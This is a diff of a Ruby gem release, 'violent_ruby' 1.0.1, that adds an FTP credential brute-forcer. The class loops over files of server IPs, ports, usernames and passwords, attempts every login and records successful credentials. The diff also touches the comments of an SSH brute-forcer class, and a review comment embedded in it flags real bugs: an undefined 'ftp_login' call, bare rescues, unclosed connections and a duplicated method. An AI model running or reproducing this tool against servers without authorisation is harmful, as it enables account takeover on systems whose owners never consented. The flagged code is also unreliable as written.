violent_ruby 1.0.0 → 1.0.1
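--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA1:
-metadata.gz:
-data.tar.gz:
+metadata.gz: cda346e57dd13576d7868364849f39b07f1d3358
+data.tar.gz: b2bab88d80cfcdcf1905d37e5133290ff2ffacee
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 24d0dd09c999a3e0115b2c845257e01c24d4c4aa662e2c587cf103b0e3811be120c85d3da92af7efbc2ec32708e4effb333155c4d9a406575f0c31b61ee8658e
+data.tar.gz: d04fa5bd6b888b5210a2332ca099046566296f22977a996b484f82a11c381305269199b40009813f143fee9ab87dde8b6d3298ace24ebc62d413eec287686ad4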
@@ -1,143 +1,208 @@
|
|
1
1
|
require 'net/ftp'
|
2
2
|
|
3
3
|
module ViolentRuby
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
|
8
|
-
|
9
|
-
|
10
|
-
|
11
|
-
|
12
|
-
|
13
|
-
|
14
|
-
|
15
|
-
|
16
|
-
|
17
|
-
|
18
|
-
|
4
|
+
# The Ftp Brute Forcer class provides a simply way to
|
5
|
+
# brute-force an FTP server's credentials.
|
6
|
+
# @author Kent 'picat' Gruber
|
7
|
+
#
|
8
|
+
# @example Basic Usage
|
9
|
+
# ftp = FtpBruteForcer.new
|
10
|
+
# ftp.users = "resources/ftp_users.txt"
|
11
|
+
# ftp.passwords = "resources/ftp_passwords.txt"
|
12
|
+
# ftp.ips = "resources/ftp_ips.txt"
|
13
|
+
# ftp.ports = "resources/ftp_ports.txt"
|
14
|
+
# # brue'm!
|
15
|
+
# ftp.brute_force!
|
16
|
+
# # => results
|
17
|
+
#
|
18
|
+
class FtpBruteForcer
|
19
|
+
# @attr [String] users Path to file containing users.
|
19
20
|
attr_accessor :users
|
20
|
-
|
21
|
-
|
22
|
-
|
23
|
-
|
24
|
-
#
|
25
|
-
|
26
|
-
|
27
|
-
|
28
|
-
|
29
|
-
|
30
|
-
|
31
|
-
|
32
|
-
|
33
|
-
|
34
|
-
|
35
|
-
|
36
|
-
|
37
|
-
|
38
|
-
|
39
|
-
|
40
|
-
|
41
|
-
|
42
|
-
|
43
|
-
|
44
|
-
|
45
|
-
|
46
|
-
|
47
|
-
|
48
|
-
|
49
|
-
|
50
|
-
|
51
|
-
|
52
|
-
|
53
|
-
|
54
|
-
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
60
|
-
|
61
|
-
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
81
|
-
|
82
|
-
|
83
|
-
|
84
|
-
|
85
|
-
|
86
|
-
|
87
|
-
|
88
|
-
|
89
|
-
|
90
|
-
|
91
|
-
|
92
|
-
|
93
|
-
|
94
|
-
|
95
|
-
|
96
|
-
|
97
|
-
|
98
|
-
|
99
|
-
|
100
|
-
|
101
|
-
|
102
|
-
|
103
|
-
|
104
|
-
|
105
|
-
|
106
|
-
|
107
|
-
|
108
|
-
|
109
|
-
|
110
|
-
|
111
|
-
|
112
|
-
|
113
|
-
|
114
|
-
|
115
|
-
|
116
|
-
|
117
|
-
|
118
|
-
|
119
|
-
|
120
|
-
|
121
|
-
|
122
|
-
|
123
|
-
|
124
|
-
|
125
|
-
|
126
|
-
|
127
|
-
|
128
|
-
|
129
|
-
|
130
|
-
|
131
|
-
|
132
|
-
|
133
|
-
|
134
|
-
|
135
|
-
|
136
|
-
|
137
|
-
|
138
|
-
|
139
|
-
|
140
|
-
|
141
|
-
|
142
|
-
|
21
|
+
# @attr [String] passwords Path to file containing passwords.
|
22
|
+
attr_accessor :passwords
|
23
|
+
# @attr [String] ips Path to file containing ip addresses.
|
24
|
+
attr_accessor :ips
|
25
|
+
# @attr [String] ports Path to file containing ports.
|
26
|
+
attr_accessor :ports
|
27
|
+
|
28
|
+
# Create a new Ftp Brute Forcer.
|
29
|
+
#
|
30
|
+
# @param [Hash] args The options to create a new Ftp Brute Forcer.
|
31
|
+
# @param args [String] :users The path to a file of users to attempt.
|
32
|
+
# @param args [String] :passwords The path to a file of passwords to attempt.
|
33
|
+
# @param args [String] :ips The path to a file of server ips to attempt to connect to.
|
34
|
+
# @param args [String] :ports The path to a file of service ports to attempt to connect to.
|
35
|
+
def initialize(args = {})
|
36
|
+
@users = args[:users] if args[:users] && File.readable?(args[:users])
|
37
|
+
@passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
|
38
|
+
@ips = args[:ips] if args[:ips] && File.readable?(args[:ips])
|
39
|
+
@ports = args[:ports] if args[:ports] && File.readable?(args[:ports])
|
40
|
+
@ftp = Net::FTP.new
|
41
|
+
end
|
42
|
+
|
43
|
+
# Brute force some'a dem FTP login credz.
|
44
|
+
#
|
45
|
+
# @param [Hash] args The options to brute force.
|
46
|
+
# @param args [String] :users The path to a file of users to attempt.
|
47
|
+
# @param args [String] :passwords The path to a file of passwords to attempt.
|
48
|
+
# @param args [String] :ips The path to a file of server ips to attempt to connect to.
|
49
|
+
# @param args [String] :ports The path to a file of service ports to attempt to connect to.
|
50
|
+
def brute_force(args = {})
|
51
|
+
meets_our_requirements?(args)
|
52
|
+
results = []
|
53
|
+
ips = args[:ips] || @ips
|
54
|
+
ports = args[:ports] || @ports
|
55
|
+
users = args[:users] || @users
|
56
|
+
passwords = args[:passwords] || @passwords
|
57
|
+
iterate_over(ips).each do |ip|
|
58
|
+
iterate_over(ports).each do |port|
|
59
|
+
next unless connectable?(ip: ip, port: port)
|
60
|
+
iterate_over(users).each do |user|
|
61
|
+
iterate_over(passwords).each do |password|
|
62
|
+
if able_to_login?(ip: ip, port: port, username: user, password: password)
|
63
|
+
result = format_result("SUCCESS", ip, port, user, password)
|
64
|
+
else
|
65
|
+
result = format_result("FAILURE", ip, port, user, password)
|
66
|
+
end
|
67
|
+
results << result
|
68
|
+
yield result if block_given?
|
69
|
+
end
|
70
|
+
end
|
71
|
+
end
|
72
|
+
end
|
73
|
+
results
|
74
|
+
end
|
75
|
+
|
76
|
+
# brute_force! is the same as brute_force
|
77
|
+
alias brute_force! brute_force
|
78
|
+
|
79
|
+
# Check if a given IP address and port can connceted to.
|
80
|
+
# @see #brute_force
|
81
|
+
# @param [Hash] args the options to brute force.
|
82
|
+
# @param args [String] :ip The ip address to attempt to connect to.
|
83
|
+
# @param args [String] :port The port to attempt to connect to.
|
84
|
+
# @return [Boolean]
|
85
|
+
def connectable?(args = {})
|
86
|
+
@ftp.connect(args[:ip], args[:port])
|
87
|
+
return true if @ftp.last_response_code == "220"
|
88
|
+
false
|
89
|
+
rescue
|
90
|
+
false
|
91
|
+
end
|
92
|
+
|
93
|
+
# Check if a given IP address, port, username and passwords
|
94
|
+
# are correct to login.
|
95
|
+
# @see #brute_force
|
96
|
+
# @param [Hash] args
|
97
|
+
# @param args [String] :ip
|
98
|
+
# @param args [String] :port
|
99
|
+
# @param args [String] :username
|
100
|
+
# @param args [String] :password
|
101
|
+
# @return [Boolean]
|
102
|
+
def able_to_login?(args = {})
|
103
|
+
@ftp.connect(args[:ip], args[:port])
|
104
|
+
@ftp.login(args[:username], args[:password])
|
105
|
+
if @ftp.welcome == "230 Login successful.\n"
|
106
|
+
@ftp.close
|
107
|
+
return true
|
108
|
+
end
|
109
|
+
ftp_login.quit
|
110
|
+
false
|
111
|
+
rescue
|
112
|
+
false
|
113
|
+
end
|
114
|
+
|
115
|
+
|
116
|
+
private
|
117
|
+
|
118
|
+
# @api private
|
119
|
+
# Format the results from brute force attempts.
|
120
|
+
# @see #brute_force
|
121
|
+
# @param [String] type
|
122
|
+
# @param [String] ip
|
123
|
+
# @param [Integer] port
|
124
|
+
# @param [String] user
|
125
|
+
# @param [String] password
|
126
|
+
# @return [Hash]
|
127
|
+
def format_result(type, ip, port, user, password)
|
128
|
+
{ time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
|
129
|
+
end
|
130
|
+
|
131
|
+
# @api private
|
132
|
+
# Iterate over each line in a file, stripping each line as it goes.
|
133
|
+
# @see File
|
134
|
+
# @param [String] file
|
135
|
+
# @return [Enumerator]
|
136
|
+
def iterate_over(file)
|
137
|
+
File.foreach(file).map(&:strip)
|
138
|
+
end
|
139
|
+
|
140
|
+
# @api private
|
141
|
+
# Check if the given arguments contain an ip, port, password and user files.
|
142
|
+
# @see #brute_force
|
143
|
+
# @param [Hash] args the options to brute force.
|
144
|
+
# @param args [String] :ips
|
145
|
+
# @param args [String] :ports
|
146
|
+
# @param args [String] :passwords
|
147
|
+
# @param args [String] :users
|
148
|
+
# @return [Boolean]
|
149
|
+
def meets_our_requirements?(args = {})
|
150
|
+
raise "No ip addresses to connect to." unless ips?(args)
|
151
|
+
raise "No ports to connect to." unless ports?(args)
|
152
|
+
raise "No passwords to try." unless passwords?(args)
|
153
|
+
raise "No users to try." unless users?(args)
|
154
|
+
true
|
155
|
+
end
|
156
|
+
|
157
|
+
# @api private
|
158
|
+
# Check if the given arguments contains ips, or has been set.
|
159
|
+
# @see #meets_our_requirements?
|
160
|
+
# @param [Hash] args the options to brute force.
|
161
|
+
# @param args [String] :ips
|
162
|
+
# @return [Boolean]
|
163
|
+
def ips?(args = {})
|
164
|
+
return true if args[:ips] || @ips
|
165
|
+
false
|
166
|
+
end
|
167
|
+
|
168
|
+
# @api private
|
169
|
+
# Check if the given arguments contains passwords, or has been set.
|
170
|
+
# @see #meets_our_requirements?
|
171
|
+
# @param [Hash] args
|
172
|
+
# @param args [String] :passwords
|
173
|
+
# @return [Boolean]
|
174
|
+
def passwords?(args = {})
|
175
|
+
return true if args[:passwords] || @passwords
|
176
|
+
false
|
177
|
+
end
|
178
|
+
def passwords?(args = {})
|
179
|
+
return true if args[:passwords] || @passwords
|
180
|
+
false
|
181
|
+
end
|
182
|
+
|
183
|
+
# @api private
|
184
|
+
# Check if the given arguments contains ports, or has been set.
|
185
|
+
# @see #meets_our_requirements?
|
186
|
+
# @param [Hash] args
|
187
|
+
# @param args [String] :ports
|
188
|
+
# @return [Boolean]
|
189
|
+
def ports?(args = {})
|
190
|
+
return true if args[:ports] || @ports
|
191
|
+
false
|
192
|
+
end
|
193
|
+
|
194
|
+
# @api private
|
195
|
+
# Check if the given arguments contains users, or has been set.
|
196
|
+
# @see #meets_our_requirements?
|
197
|
+
# @param [Hash] args
|
198
|
+
# @param args [String] :users
|
199
|
+
# @return [Boolean]
|
200
|
+
def users?(args = {})
|
201
|
+
return true if args[:users] || @users
|
202
|
+
false
|
203
|
+
end
|
204
|
+
|
205
|
+
|
206
|
+
|
207
|
+
end
|
143
208
|
end
|
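Review bot: `able_to_login?` calls `ftp_login.quit` on its fall-through path (new line 109), but nothing named `ftp_login` is defined anywhere in this hunk, so that line raises NameError, the bare `rescue` turns it into `false`, and the control connection opened by `@ftp.connect` is never closed. The line should read `@ftp.quit`, and the rescue should be narrowed to the errors the FTP calls are expected to raise, for example `rescue Net::FTPError, SystemCallError, SocketError`, so that programming mistakes surface instead of being recorded as FAILURE results. `connectable?` (new lines 85-91) has the same bare `rescue` and also returns without closing the connection it just opened on the shared `@ftp` object. Separately, `passwords?` is defined twice in a row (new lines 174-181); the second, undocumented copy should be deleted.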
@@ -14,7 +14,7 @@ module ViolentRuby
|
|
14
14
|
# ssh.ips = "resources/ssh_ips.txt"
|
15
15
|
# ssh.ports = "resources/ssh_ports.txt"
|
16
16
|
# # brue'm!
|
17
|
-
#
|
17
|
+
# ssh.brute_force!
|
18
18
|
# # => results
|
19
19
|
#
|
20
20
|
class SSHBruteForcer
|
@@ -24,7 +24,7 @@ module ViolentRuby
|
|
24
24
|
attr_accessor :passwords
|
25
25
|
# @attr [String] ips Path to file containing ip addresses.
|
26
26
|
attr_accessor :ips
|
27
|
-
# @attr [String]
|
27
|
+
# @attr [String] ports Path to file containing ports.
|
28
28
|
attr_accessor :ports
|
29
29
|
|
30
30
|
# Create a new SSH Brute Forcer.
|
data/lib/violent_ruby/version.rb
CHANGED